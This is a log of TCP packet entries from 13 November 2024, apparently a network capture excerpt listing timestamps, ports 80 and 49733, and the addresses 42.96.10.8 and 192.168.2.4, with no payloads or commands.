                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776787996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776803017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776818037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776819944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776819944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776843071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776851892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776851892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776858091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776873112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776887894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776904106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776909113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776918888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776936054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776940107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776951075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776968002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776981115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776987076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776987076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776998043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777012110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777024984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777040005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777060032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777060032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777065992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777080059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777095079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777112007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777118921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777136087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777148962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777148962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777149916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777165890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777183056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777199984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777214050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777241945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777241945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777241945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777549028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777575970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777589083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777618885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777632952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777647018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777662039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777673960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777677059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777693987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777697086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777709961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777725935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777733088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777779102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777805090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777818918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777834892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777834892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777889967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777904987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777921915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777936935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777961969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777976990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777977943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777977943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.777998924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778029919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778045893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778060913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778076887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778095007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778105974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778105974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778120995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778135061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778152943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778172970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778172970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778177977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778194904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778208971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778225899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778227091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778239965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778254032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778268099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778295040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778295040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778295040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778304100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778320074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778337002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.778352022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.779356003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.784673929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.784718037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.784739017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.784739971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.784826040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.784848928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.784879923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.784895897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.784895897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.784900904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.784918070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.784933090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.784949064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.784965992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.784980059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.784995079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785022020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785022020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785022020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785083055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785096884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785113096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785161972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785177946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785192013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785192013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785192966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785214901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785231113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785248995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785254002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785254002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785264969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785276890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785280943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785298109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785339117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785350084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785353899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785373926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785387039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785402060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785418034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785423994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785470963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785487890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785502911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785520077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785526991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785526991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785536051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785552025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785631895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785665035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785686970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785707951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785716057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785716057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785716057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785803080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785819054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785844088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785859108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785859108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785887957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785904884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785926104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785938025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785952091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785965919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785981894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.785995960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786011934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786027908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786027908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786027908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786027908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786046028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786078930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786087990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786104918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786120892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786135912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786150932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786164045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786178112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786178112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786178112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786221981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786232948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786248922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786263943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786278963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786294937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786364079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786364079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786391973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786407948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786421061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786433935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786459923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786493063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786509037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786513090 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786513090 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786526918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786540985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786556959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786576986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786593914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786593914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786606073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786756992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786781073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786818027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786839962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786861897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786895037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786895037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786895037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786895990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786923885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786966085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.786987066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787025928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787046909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787081957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787101030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787112951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787112951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787133932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787156105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787173986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787206888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787225962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787235975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787235975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787245989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787264109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787265062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787280083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787297964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787323952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787337065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787354946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787358999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787370920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787386894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787400961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787415981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787440062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787456036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787465096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787465096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787465096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787470102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787486076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787502050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787516117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787527084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787527084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787540913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787544012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787559986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787578106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787592888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787611008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787616014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787616014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787651062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787664890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787694931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787707090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787723064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787739038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787755966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787770987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787786007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787832975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787832975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787832975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787832975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787837982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787931919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787945986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787961006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787976980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.787992001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788005114 CET4973380192.168.2.442.96.10.8
